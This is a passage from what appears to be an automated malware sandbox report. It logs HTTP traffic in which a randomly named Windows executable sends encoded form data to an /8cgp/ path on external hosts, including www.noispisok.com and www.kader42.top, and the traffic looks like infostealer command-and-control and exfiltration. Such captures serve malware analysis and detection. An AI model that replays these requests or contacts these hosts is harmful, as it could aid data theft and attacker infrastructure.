                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4d 6a 64 2f 44 4e 78 44 4a 47 2b 50 38 58 66 6e 63 78 57 56 37 48 36 6e 6a 44 4b 44 37 6b 46 33 75 38 74 6b 49 35 45 45 35 6b 50 61 36 73 65 68 75 43 55 5a 37 33 56 6e 69 4f 76 44 4c 49 55 46 50 71 79 4f 44 75 54 38 31 52 4b 57 6f 79 4a 4b 75 49 47 71 75 33 67 4e 71 46 55 32 77 61 4e 64 50 51 75 75 6b 4c 52 31 55 47 78 33 4d 32 65 4c 59 31 52 2f 43 57 4c 4f 64 59 71 62 68 42 48 74 7a 75 4f 6c 56 78 76 32 54 41 32 7a 31 52 2f 69 55 37 52 38 45 62 4b 56 6e 65 43 44 63 32 70 70 6d 6b 6a 44 6a 50 63 53 74 56 45 67 42 56 50 66 54 42 38 6e 52 4b 59 59 6a 4b 33 4e 4b 4a 57 75 4d 70 56 6a 4f 2f 67 79 59 36 75 59 6d 4d 2f 58 6b 68 7a 2b 2f 34 50 43 64 34 49 37 4f 75 31 53 50 30 65 57 51 50 39 4a 66 35 50 36 5a 4a 70 55 64 30 4d 31 66 5a 4d 69 6f 33 31 38 61 78 68 45 79 65 52 6b 6b 46 37 57 50 32 49 64 5a 67 30 48 61 77 6c 34 4e 5a 70 45 78 4b 78 6d 77 56 64 6e 43 63 74 75 79 6b 4e 72 54 4e 44 43 59 48 67 4e 65 58 2f 30 50 44 34 2b 67 31 2f 4c 45 41 78 39 78 67 55 37 67 51 75 6a 6f 53 53 4b 38 6c 65 4b 65 4e 4b 4b 32 6d 70 75 53 58 62 4f 6c 33 38 73 7a 41 4c 4a 4d 58 4f 45 7a 78 54 78 58 5a 76 36 78 4d 6b 68 59 67 79 67 46 47 65 55 77 69 44 52 6e 30 6e 4b 42 36 45 52 43 5a 57 4c 6a 2b 79 67 42 4a 51 31 43 43 68 58 68 4a 2b 54 44 4b 44 38 6b 6b 32 77 41 4f 78 6f 71 51 77 68 73 48 77 61 57 6c 62 46 77 77 6e 39 51 78 2b 53 74 6d 69 50 53 4b 77 74 6a 4a 35 39 52 45 52 50 79 45 70 4a 50 73 50 49 54 4f 51 6f 44 64 36 67 7a 51 2f 4a 77 55 44 44 64 68 7a 45 2f 6b 4b 4e 4b 32 79 2f 4a 59 46 76 4d 54 53 38 75 4e 39 4b 6a 37 64 4c 61 48 65 48 5a 66 44 35 75 5a 59 4c 76 75 37 33 6a 72 66 35 39 4b 50 37 4d 39 31 72 65 69 77 57 56 52 37 49 32 70 55 69 52 4b 74 2b 4b 32 51 48 39 72 59 63 53 69 6b 75 32 69 2b 6a 43 32 4d 57 6f 41 77 36 49 79 47 73 61 43 4e 45 61 6c 4b 4e 63 35 33 54 59 6e 62 4a 7a 41 38 48 53 35 59 6a 34 49 4f 52 55 34 6d 47 32 41 2b 50 61 66 70 55 32 78 35 47 36 7a 6b 64 4b 39 53 68 70 57 78 2f 4f 34 64 73 2f 6b 69 38 61 7a 35 5a 51 69 5a 42 31 65 59 45 49 42 62 6d 74 37 53 58 54 35 74 49 30 69 35 4d 4f 6c 69 2b 41 56 53 31 30 38 59 77 54 51 50 36 56 37 61 42 64 5a 57 72 55 49 31 68 75 2b 50 42 48 4e 44 4b 4a 31 45 2f 72 59 59 38 6e 69 4b 39 54 63 6d 51 54 68 75 69 33 4a 48 55 37 4a 59 39 4f 38 44 6c 39 48 76 68 65 48 71 66 2f 71 61 2f 38 77 4e 4f 64 39 68 4d 4c 73 50 4e 51 55 5a 79 2b 71 63 6f 7a 66 2f 34 68 70 77 45 59 62 61 45 5a 35 6d 31 68 53 32 33 79 6f 38 36 2f 74 68 39 51 62 61 58 53 6b 57 4b 54 53 58 53 75 2f 54 34 73 4d 47 4f 77 62 37 69 6d 58 74 51 75 35 43 30 6f 57 4c 33 75 33 76 63 6f 68 35 47 33 50 39 78 52 63 7a 75 6c 2b 37 6b 59 33 6e 52 49 58 4a 54 6b 78 63 4f 4f 43 79 51 6a 38 69 4c 6c 68 6f 70 6b 57 54 47 53 70 4f 69 52 4e 70 67 39 56 76 51 6f 65 6f 70 4c 5a 6b 47 39 57 79 35 46 6b 33 4d 63 66 47 32 4a 39 79 44 2f 7a 57 77 2f 59 54 31 58 77 57 42 72 72 37 58 4a 30 47 71 78 38 41 6d 4b 76 32 71 6e 4b 68 79 44 6b 50 38 73 47 55 6c 58 64 2f 6e 48 68 35 30 66 74 32 65 67 38 7a 66 4a 6f 6a 63 6a 52 62 6e 64 70 63 42 6e 68 6f 51 52 43 77 74 71 68 65 41 56 30 6a 49 65 38 56 4e 50 6c 34 63 69 56 39 41 63 30 65 63 47 2f 69 34 2f 31 71 2f 77 30 6c 2f 66 47 4d 43 43 44 32 56 76 37 67 61 30 33 63 6c 4e 49 69 36 56 73 5a 4e 58 63 42 35 44 2b 44 6b 2b 6c 38 65 53 48 79 7a 63 59 44 4e 6b 41 6e 6d 57 51 4c 33 4b 6e 48 66 7a 2b 71 59 6c 39 62 78 55 6e 76 61 6a 55 70 4f 73 31 54 46 50 41 50 66 73 64 44 4b 54 67 4f 6f 4e 76 7a 51 2f 51 30 32 6b 51 6e 63 51 2b 67 50 4f 4f 61 6a 49 31 57 49 4d 74 4d 41 54 48 55 49 47 4e 78 34 34 6e 4a 52 72 73 48 4c 44 73 33 41 77 43 54 70 55 35 37 47 4e 4a 71 4e 6d 65 75 41 50 7a 69 72 6d 43 43 41 5a 2b 34 79 75 46 45 43 33 32 36 62 68 55 6c 38 47 78 6f 79 4e 61 44 6d 7a 76 79 57 56 6c 64 57 30 7a 69 35 44 68 4d 54 65 2b 50 45 64 4b 56 48 78 5a 55 70 50 38 71 52 73 75 4a 47 53 63 4e 4d 4e 5a 30 79 67 62 36 44 49 6e 41 4f 47 35 4a 6a 45 71 54 47 78 78 75 55 62 37 63 43 4d 48 63 34 72 46 65 53 49 6b 49 74 2b 51 58 49 76 79 58 43 6d 6f 68 4a 71 43 35 73 57 6e 39 74 30 41 35 79 41 65 76 6c 74 6a 65 6e 71 50 50 76 45 4f 33 69 46 47 6f 41 48
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:32:16.975320101 CEST5156OUTData Raw: 47 63 55 4f 54 36 6c 43 37 4d 70 4b 56 5a 77 47 77 53 39 36 77 68 33 39 35 6e 65 36 31 49 52 75 4a 4a 4c 34 47 6a 2f 6b 6c 44 54 4c 57 58 77 38 6a 2b 76 7a 77 62 59 4d 49 35 4d 66 49 43 6a 6f 36 32 38 62 47 59 78 45 44 65 79 55 51 30 64 36 55 2b
                                                                    Data Ascii: GcUOT6lC7MpKVZwGwS96wh395ne61IRuJJL4Gj/klDTLWXw8j+vzwbYMI5MfICjo628bGYxEDeyUQ0d6U+5uENirj1WjruqKG6kwxsTf8gqIEeAkqizTG+KkTb7XZbWOKgaYbzviX/VgYVdnilGR8z80emtzkR1SsgDaEYF9m4Wp1gciuGjoiB0BDaT4pDKcfTWN9admPGBbapJ9BX2zXcqe7KnV11qNVMS7cA4g0GlVEjT19b5
                                                                    Apr 24, 2024 12:32:16.975368023 CEST5156OUTData Raw: 72 32 4b 56 63 64 55 33 67 4b 59 50 70 7a 34 46 38 66 6c 78 2b 41 75 65 63 6c 52 4c 45 47 58 6d 6e 4c 58 73 70 43 4a 33 75 56 51 61 34 59 42 45 45 4b 63 6e 4f 56 6a 56 37 74 30 7a 43 6f 46 65 71 68 72 33 67 5a 38 79 35 53 56 73 55 75 36 34 5a 68
                                                                    Data Ascii: r2KVcdU3gKYPpz4F8flx+AueclRLEGXmnLXspCJ3uVQa4YBEEKcnOVjV7t0zCoFeqhr3gZ8y5SVsUu64Zh9dfaxrUFLV9i2r456ovmSJJCCoHMGEgOzNUkNiCb3kAA5y9kLcWHhr2tVeJ4v4uS8y95QwyrH25wrgv2DiEqIlvOEYfwFhJIig48of2zTyvLOkbMnD0XNwfkQcdBVO4+5aywHQYv6fqK61Yr8jsu0pYtPZccJDgBB
                                                                    Apr 24, 2024 12:32:17.149863005 CEST2578OUTData Raw: 68 37 45 74 7a 46 34 56 54 6d 65 32 61 72 74 36 75 32 4e 6a 2f 37 46 77 6e 62 6b 65 47 57 38 35 61 31 70 7a 69 57 4e 67 6a 62 50 75 32 42 65 53 58 74 55 76 4b 52 38 36 6d 75 53 50 2b 61 34 74 69 45 36 68 4a 70 53 6b 54 37 4f 76 33 46 48 45 55 55
                                                                    Data Ascii: h7EtzF4VTme2art6u2Nj/7FwnbkeGW85a1pziWNgjbPu2BeSXtUvKR86muSP+a4tiE6hJpSkT7Ov3FHEUUsghN4RU5lN89/11+lCKjy/Ae4cadQmlj3bO/XnfHUjGBVFPR1g22p9+7dQM5iTNQdGUZq33o6WjGPcmOCuQz3lgRnlTEL/jtCeM203Q/kKNQs17tz5Yiw2td9Z7dMPj2pnl+Lc+zh0ZK2HEcdfJIC9tkqci9p5KGR
                                                                    Apr 24, 2024 12:32:17.150012016 CEST14179OUTData Raw: 57 54 37 43 39 36 48 54 45 6b 44 68 65 38 67 62 72 51 66 54 31 33 38 30 4e 36 55 45 35 74 35 73 78 32 36 63 54 4c 52 77 35 42 68 45 50 43 51 37 30 39 79 32 69 54 6a 74 42 4d 66 66 6d 72 68 75 51 39 6b 6a 67 59 6a 2b 6b 4b 7a 42 70 61 72 36 4d 37
                                                                    Data Ascii: WT7C96HTEkDhe8gbrQfT1380N6UE5t5sx26cTLRw5BhEPCQ709y2iTjtBMffmrhuQ9kjgYj+kKzBpar6M7MPWAIM4hXNKjo6VfRgw3GTLolwDR/fcs9n2uw8a0Q15fFLttRiVaJlGSrtBopSbPthmqaeVEbmhKB4ub8Y+Sw3QOmzO/3u724W6uW1D9WQ3AIQwIzNoOcXPQiT+7SYFFg0jxt0zYwwtNsJ1sZqBjo/JrdfUssmf5T
                                                                    Apr 24, 2024 12:32:17.150158882 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:16 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
                                                                    Apr 24, 2024 12:32:17.150166988 CEST9023OUTData Raw: 73 76 31 73 57 42 43 56 69 4d 65 79 67 44 37 36 70 77 61 34 47 33 59 71 4c 31 36 61 63 79 6f 53 34 35 63 73 2f 61 2f 31 61 69 62 53 39 41 7a 72 38 2f 76 51 65 49 54 72 7a 56 56 76 6e 30 70 6c 31 41 52 6e 5a 6e 43 48 52 56 37 4e 2f 5a 65 50 33 48
                                                                    Data Ascii: sv1sWBCViMeygD76pwa4G3YqL16acyoS45cs/a/1aibS9Azr8/vQeITrzVVvn0pl1ARnZnCHRV7N/ZeP3Hn2h8zYYjoBu0Zux3/fPMCLM4VxRjynWhjeGRJ4Ic5IXHHJuT/YNQAhq3VYp+Yxds9Ta38ibZXhxjqtRwzSEraRyqkUEZsjSxtZJgjaeDuhECi6Pw16N/XWH3VA4PqFwweQ+ubBIfmNccQN3BvQmb64S53EtXy6pgn
                                                                    Apr 24, 2024 12:32:17.150257111 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:32:17.150265932 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:32:17.150274992 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0
                                                                    Apr 24, 2024 12:32:17.324310064 CEST2578OUTData Raw: 66 54 57 45 4a 7a 68 68 2b 61 4d 6e 4e 55 47 75 6a 36 35 34 63 41 31 4c 4d 31 7a 62 6d 70 61 38 53 75 53 64 6e 4e 4f 38 76 2f 53 35 75 76 4c 54 39 2b 75 4f 59 78 70 56 74 6f 39 5a 30 47 6e 6f 78 51 2b 68 39 6f 49 70 61 64 61 41 62 4e 2f 39 33 72
                                                                    Data Ascii: fTWEJzhh+aMnNUGuj654cA1LM1zbmpa8SuSdnNO8v/S5uvLT9+uOYxpVto9Z0GnoxQ+h9oIpadaAbN/93rT9cQCozfVqIuuTvbHRyE0JQW7/UhFI01ntRXP2fd9Ufmfyra6OawouY104wmbWgBKKUmhrZX7pkde1NeQk+T2maupdb2s8U59uvgKwMJZ7mLP2S8yfW/OFB7yft/GlCInE/80AVZMjalJksfyx5m6KgiPVj/CX5OR
                                                                    Apr 24, 2024 12:32:17.324481010 CEST5156OUTData Raw: 30 35 4d 73 33 73 58 56 7a 59 52 64 41 63 48 57 31 73 76 41 35 4a 59 62 47 75 43 41 4e 59 49 6e 69 37 32 4f 6e 62 30 70 54 74 6a 59 58 64 64 75 30 62 4a 67 43 6d 36 68 69 51 7a 2b 46 78 2f 50 65 65 59 6f 4c 67 45 6e 45 6e 77 68 66 47 38 42 7a 50
                                                                    Data Ascii: 05Ms3sXVzYRdAcHW1svA5JYbGuCANYIni72Onb0pTtjYXddu0bJgCm6hiQz+Fx/PeeYoLgEnEnwhfG8BzPyCAh+N5U9vSeY8oUlZXpUgaF50DsvwWAUScOFkQsS2VGFHlHYEJtV8Yoheo+WhvfCuhFyzPq9Hl20S/TFsXlRToM0uR6cWSfxeVCWQbotlKnQj6KjO2JTmJRGfwkHLm0gHHwJoy0avszIpl9cHjBf3CBE8k2dkXTn


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.11.2050298108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:19.671590090 CEST388OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:19.841404915 CEST209INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:19 GMT
                                                                    Connection: close
                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                    Data Ascii: 3
                                                                    Apr 24, 2024 12:32:19.841505051 CEST805INData Raw: 33 31 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e5 a8
                                                                    Data Ascii: 31e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.c
                                                                    Apr 24, 2024 12:32:19.841517925 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.11.205029984.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:25.195786953 CEST662OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 47 77 52 72 59 6b 7a 44 4b 4b 39 51 58 31 6e 72 55 52 6b 2b 45 6c 67 32 61 62 62 54 45 2f 36 6b 62 2b 6f 4b 76 49 77 6f 30 49 4e 79 6c 6b 70 4e 6d 49 51 6f 6a 6b 55 33 4b 7a 48 39 63 52 63 77 6b 75 37 76 74 7a 54 76 54 63 62 78 62 4b 70 59 6d 4c 38 70 31 4c 56 73 4a 5a 4a 49 42 35 51 58 63 44 70 6b 47 75 5a 56 78 78 69 65 72 48 49 77 47 4a 6c 69 69 56 41 64 6f 69 48 6b 44 57 66 30 69 63 54 74 2f 6f 54 42 69 53 42 6d 74 5a 32 54 44 7a 69 61 62 5a 51 68 35 64 37 38 47 50 79 6b 34 32 31 4d 36 44 4a 34 53 76 6a 48 4d 39 59 37 48 6b 4d 4b 66 41 3d 3d
                                                                    Data Ascii: Xh9lX=ya9na7HurqMwGwRrYkzDKK9QX1nrURk+Elg2abbTE/6kb+oKvIwo0INylkpNmIQojkU3KzH9cRcwku7vtzTvTcbxbKpYmL8p1LVsJZJIB5QXcDpkGuZVxxierHIwGJliiVAdoiHkDWf0icTt/oTBiSBmtZ2TDziabZQh5d78GPyk421M6DJ4SvjHM9Y7HkMKfA==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.11.205030084.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:28.051613092 CEST1002OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 48 51 42 72 61 46 7a 44 4d 71 39 52 5a 56 6e 72 66 78 6b 36 45 6c 73 32 61 61 66 44 45 4e 4f 6b 62 62 4d 4b 75 4a 77 6f 7a 49 4e 79 78 55 70 4d 34 34 51 6e 6a 6b 59 4a 4b 32 2f 39 63 52 49 77 6c 63 44 76 76 44 54 67 59 38 62 32 4e 61 70 46 69 4c 38 5a 31 4c 5a 4b 4a 62 31 49 43 49 73 58 47 42 42 6b 58 76 5a 61 6e 68 69 63 74 48 49 76 4a 70 6c 57 69 56 46 69 6f 6e 4b 54 44 45 44 30 69 38 7a 74 2b 6f 54 47 73 69 41 75 76 5a 33 78 43 78 43 52 53 71 30 4f 35 4f 6e 44 47 4e 75 2f 77 6e 6b 4c 31 46 68 6b 49 2f 54 6d 54 63 74 63 47 30 74 75 4d 33 64 66 35 32 49 51 52 5a 59 4f 2b 4a 77 68 6e 39 4c 42 42 62 4c 69 61 55 38 6c 62 6e 4b 4d 52 6e 71 35 6c 4a 74 63 62 68 5a 38 6f 6d 57 66 6e 55 5a 62 57 61 37 44 37 66 70 51 56 32 69 62 58 42 4d 47 45 36 76 58 6e 46 59 7a 66 39 59 4d 35 52 74 34 4f 65 62 6b 4f 6d 49 31 62 35 73 6f 49 55 5a 7a 58 54 4d 41 42 64 6e 30 56 47 35 52 4e 4b 62 4c 53 38 54 6a 6a 42 38 37 72 56 4f 50 35 4e 2b 30 55 78 58 52 41 46 33 62 6c 48 7a 73 32 61 4a 67 54 58 46 59 65 6a 6f 36 71 57 48 77 62 6c 68 55 41 36 36 77 6f 64 4a 42 70 33 45 73 38 54 46 6d 63 4a 75 77 45 50 70 54 39 4d 59 4e 4b 55 4a 41 42 6d 74 66 35 41 35 50 61 76 49 37 32 53 34 50 64 6e 79 6a 35 53 42 71 49 48 79 62 45 54 4f 6f 52 74 34 73 6d 75 46 43 45 57 52 42 4e 71 51 30 52 33 2f 39 7a 53 4a 72 36 4d 6a 52 4b 4c 50 54 2b 48 4e 76 7a 61 39 6f 36 61 54 4f 39 56 42 5a 67 74 38 59 59 74 34 58 5a 76 4c 52 34 42 41 69 66 6d 4d 4a 33 6d 46 48 59 4f 4a 70 6b 31 39 77 32 56 4e 45 4a 37 36 43 45 73 4c 59 6c 4c 72 73 53 46 76 65 79 39 4b 74 31 5a 68 77 74 57 4e 43 59 74 59 3d
                                                                    Data Ascii: Xh9lX=ya9na7HurqMwHQBraFzDMq9RZVnrfxk6Els2aafDENOkbbMKuJwozINyxUpM44QnjkYJK2/9cRIwlcDvvDTgY8b2NapFiL8Z1LZKJb1ICIsXGBBkXvZanhictHIvJplWiVFionKTDED0i8zt+oTGsiAuvZ3xCxCRSq0O5OnDGNu/wnkL1FhkI/TmTctcG0tuM3df52IQRZYO+Jwhn9LBBbLiaU8lbnKMRnq5lJtcbhZ8omWfnUZbWa7D7fpQV2ibXBMGE6vXnFYzf9YM5Rt4OebkOmI1b5soIUZzXTMABdn0VG5RNKbLS8TjjB87rVOP5N+0UxXRAF3blHzs2aJgTXFYejo6qWHwblhUA66wodJBp3Es8TFmcJuwEPpT9MYNKUJABmtf5A5PavI72S4Pdnyj5SBqIHybETOoRt4smuFCEWRBNqQ0R3/9zSJr6MjRKLPT+HNvza9o6aTO9VBZgt8YYt4XZvLR4BAifmMJ3mFHYOJpk19w2VNEJ76CEsLYlLrsSFvey9Kt1ZhwtWNCYtY=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    56192.168.11.205030184.32.84.3280
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:30.916127920 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 48 51 42 72 61 46 7a 44 4d 71 39 52 5a 56 6e 72 66 78 6b 36 45 6c 73 32 61 61 66 44 45 4e 57 6b 59 74 51 4b 76 71 49 6f 79 49 4e 79 79 55 70 4a 34 34 51 41 6a 6e 6f 56 4b 32 36 4b 63 53 77 77 6c 4c 48 76 76 78 4c 67 64 38 62 7a 43 36 70 48 6d 4c 38 33 31 4c 56 6b 4a 62 67 2f 42 35 59 58 63 44 5a 6b 42 4d 78 56 36 68 69 65 74 48 49 6a 62 5a 6c 65 69 56 4a 49 6f 6e 47 54 44 48 6e 30 34 71 33 74 38 35 54 47 6c 53 41 68 35 70 33 36 4d 52 44 76 53 71 67 38 35 4f 6e 39 47 4d 36 2f 77 6b 63 4c 30 43 31 6e 47 2f 54 6d 49 63 74 66 43 30 68 55 4d 33 42 39 35 33 73 51 52 61 6f 4f 2b 70 77 68 33 4a 2f 43 49 62 4c 6f 51 30 38 2b 4e 6e 4f 36 52 6e 2b 48 6c 4c 68 63 62 52 4e 38 36 68 43 66 67 31 5a 62 4a 4b 37 42 31 2f 70 44 62 57 69 58 58 42 63 73 45 35 6e 74 6e 44 59 7a 66 66 51 4d 79 54 4a 2f 48 65 62 6d 53 57 4a 76 4e 35 67 38 49 56 31 76 58 54 4d 51 42 66 4c 30 56 58 4a 52 4f 4c 61 64 66 4d 54 75 6f 68 38 55 79 6c 79 53 35 4e 6a 34 55 30 58 42 41 47 62 62 71 48 7a 73 67 74 39 2f 49 33 46 54 58 44 6f 6b 33 6d 48 6e 62 6c 74 49 41 2f 62 46 6f 70 42 42 76 44 67 73 74 7a 46 6c 59 70 75 73 4b 76 70 52 71 63 59 4e 